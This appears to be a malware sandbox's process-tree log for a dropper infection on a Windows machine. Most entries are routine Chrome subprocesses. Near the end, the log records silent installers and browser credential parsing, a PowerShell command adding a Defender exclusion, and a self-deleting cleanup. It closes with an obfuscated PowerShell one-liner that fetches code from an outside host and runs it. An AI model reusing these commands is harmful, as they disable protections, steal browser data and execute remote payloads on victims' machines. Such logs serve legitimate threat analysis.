C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ffc67a56e00,0x7ffc67a56e10,0x7ffc67a56e2011⤵PID:4220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1764 /prefetch:811⤵PID:5372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1676 /prefetch:211⤵PID:4316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2664 /prefetch:111⤵PID:5240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2656 /prefetch:111⤵PID:4976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:111⤵PID:5020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4004 /prefetch:111⤵PID:2592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4156 /prefetch:811⤵PID:1484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4304 /prefetch:811⤵PID:4972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4128 /prefetch:811⤵PID:1356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:111⤵PID:4800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2252 /prefetch:111⤵PID:5972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3244 /prefetch:811⤵PID:4396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4564 /prefetch:811⤵PID:2124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5408 /prefetch:811⤵PID:10288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:811⤵PID:10388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3348 /prefetch:811⤵PID:6276
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings11⤵PID:6268
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff70e807740,0x7ff70e807750,0x7ff70e80776012⤵PID:6312
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:811⤵PID:6400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4072 /prefetch:811⤵PID:6480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5080 /prefetch:811⤵PID:6584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=840 /prefetch:811⤵PID:6740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1580 /prefetch:811⤵PID:6812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3684 /prefetch:811⤵PID:6872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4276 /prefetch:811⤵PID:6956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4044 /prefetch:811⤵PID:7788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 /prefetch:811⤵PID:7776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5092 /prefetch:811⤵PID:7916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4868 /prefetch:811⤵PID:7768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3352 /prefetch:811⤵PID:7984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3980 /prefetch:811⤵PID:8048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4344 /prefetch:811⤵PID:8348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4172 /prefetch:811⤵PID:8444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3320 /prefetch:811⤵PID:8500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5760 /prefetch:811⤵PID:8556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3944 /prefetch:811⤵PID:8620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5752 /prefetch:811⤵PID:9380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5476 /prefetch:811⤵PID:9576
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1436 /prefetch:811⤵PID:9656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1648 /prefetch:811⤵PID:9748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5576 /prefetch:811⤵PID:9856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:111⤵PID:9848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5636 /prefetch:811⤵PID:9960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5552 /prefetch:811⤵PID:10064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5520 /prefetch:811⤵PID:3784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5744 /prefetch:811⤵PID:10276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3684 /prefetch:811⤵PID:10616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4080 /prefetch:811⤵PID:10312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5724 /prefetch:811⤵PID:10932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5756 /prefetch:811⤵PID:3792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:111⤵PID:10296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:811⤵PID:4840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4864 /prefetch:811⤵PID:11236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=920 /prefetch:811⤵PID:10180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4056 /prefetch:811⤵PID:6100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:111⤵PID:6080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3796 /prefetch:811⤵PID:5500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1428 /prefetch:811⤵PID:4264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4876 /prefetch:811⤵PID:6172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=4384 /prefetch:211⤵PID:7332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1664,6099426611951809682,11857821225405419348,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3916 /prefetch:811⤵PID:7008
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg7⤵
- Runs .reg file with regedit
PID:5824
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b firefox7⤵PID:4184
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b chrome7⤵PID:10356
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b edge7⤵PID:10480
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-VH9MP.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-VH9MP.tmp\PictureLAb.exe" /Verysilent3⤵PID:664
-
C:\Users\Admin\AppData\Local\Temp\is-TUTSM.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-TUTSM.tmp\PictureLAb.tmp" /SL5="$50216,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-VH9MP.tmp\PictureLAb.exe" /Verysilent4⤵PID:6128
-
C:\Users\Admin\AppData\Local\Temp\is-HMB9N.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-HMB9N.tmp\Setup.exe" /VERYSILENT5⤵PID:2868
-
C:\Users\Admin\AppData\Local\Temp\is-9EKG6.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-9EKG6.tmp\Setup.tmp" /SL5="$40326,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-HMB9N.tmp\Setup.exe" /VERYSILENT6⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\is-UL9DJ.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-UL9DJ.tmp\kkkk.exe" /S /UID=lab2147⤵PID:5920
-
C:\Program Files\Windows Defender\JCGDPNKXSQ\prolab.exe"C:\Program Files\Windows Defender\JCGDPNKXSQ\prolab.exe" /VERYSILENT8⤵PID:696
-
C:\Users\Admin\AppData\Local\Temp\is-3UB7S.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-3UB7S.tmp\prolab.tmp" /SL5="$502A2,575243,216576,C:\Program Files\Windows Defender\JCGDPNKXSQ\prolab.exe" /VERYSILENT9⤵PID:4464
-
-
-
C:\Users\Admin\AppData\Local\Temp\d0-6efe7-4f8-b2587-1be2902702706\Luzhebomaesy.exe"C:\Users\Admin\AppData\Local\Temp\d0-6efe7-4f8-b2587-1be2902702706\Luzhebomaesy.exe"8⤵PID:5308
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2yoyjv2z.dz2\GcleanerWW.exe /mixone & exit9⤵PID:8860
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eeltze3x.kmk\privacytools5.exe & exit9⤵PID:10172
-
C:\Users\Admin\AppData\Local\Temp\eeltze3x.kmk\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\eeltze3x.kmk\privacytools5.exe10⤵PID:10260
-
C:\Users\Admin\AppData\Local\Temp\eeltze3x.kmk\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\eeltze3x.kmk\privacytools5.exe11⤵PID:3516
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uyicqkio.miv\setup.exe /8-2222 & exit9⤵PID:10408
-
C:\Users\Admin\AppData\Local\Temp\uyicqkio.miv\setup.exeC:\Users\Admin\AppData\Local\Temp\uyicqkio.miv\setup.exe /8-222210⤵PID:10796
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Misty-Pine"11⤵PID:10984
-
-
C:\Program Files (x86)\Misty-Pine\7za.exe"C:\Program Files (x86)\Misty-Pine\7za.exe" e -p154.61.71.51 winamp-plugins.7z11⤵PID:8828
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s40evygw.eqn\MultitimerFour.exe & exit9⤵PID:10544
-
C:\Users\Admin\AppData\Local\Temp\s40evygw.eqn\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\s40evygw.eqn\MultitimerFour.exe10⤵PID:10860
-
C:\Users\Admin\AppData\Local\Temp\QW91L0AZFP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\QW91L0AZFP\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10411⤵PID:5508
-
C:\Users\Admin\AppData\Local\Temp\QW91L0AZFP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\QW91L0AZFP\multitimer.exe" 1 3.1615014709.60432b3574560 10412⤵PID:7128
-
C:\Users\Admin\AppData\Local\Temp\QW91L0AZFP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\QW91L0AZFP\multitimer.exe" 2 3.1615014709.60432b357456013⤵PID:7364
-
C:\Users\Admin\AppData\Local\Temp\ogpapgjgwph\safebits.exe"C:\Users\Admin\AppData\Local\Temp\ogpapgjgwph\safebits.exe" /S /pubid=1 /subid=45114⤵PID:9100
-
-
C:\Users\Admin\AppData\Local\Temp\25blp5pdll1\vict.exe"C:\Users\Admin\AppData\Local\Temp\25blp5pdll1\vict.exe" /VERYSILENT /id=53514⤵PID:9112
-
C:\Users\Admin\AppData\Local\Temp\is-N7LBU.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-N7LBU.tmp\vict.tmp" /SL5="$50114,870426,780800,C:\Users\Admin\AppData\Local\Temp\25blp5pdll1\vict.exe" /VERYSILENT /id=53515⤵PID:9316
-
C:\Users\Admin\AppData\Local\Temp\is-TLI97.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-TLI97.tmp\wimapi.exe" 53516⤵PID:9972
-
C:\Users\Admin\AppData\Local\Temp\13QBhxd4P.exe"C:\Users\Admin\AppData\Local\Temp\13QBhxd4P.exe"17⤵PID:6356
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 13QBhxd4P.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\13QBhxd4P.exe" & del C:\ProgramData\*.dll & exit18⤵PID:7984
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 13QBhxd4P.exe /f19⤵
- Kills process with taskkill
PID:8808
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 619⤵
- Delays execution with timeout.exe
PID:10592
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"17⤵PID:2532
-
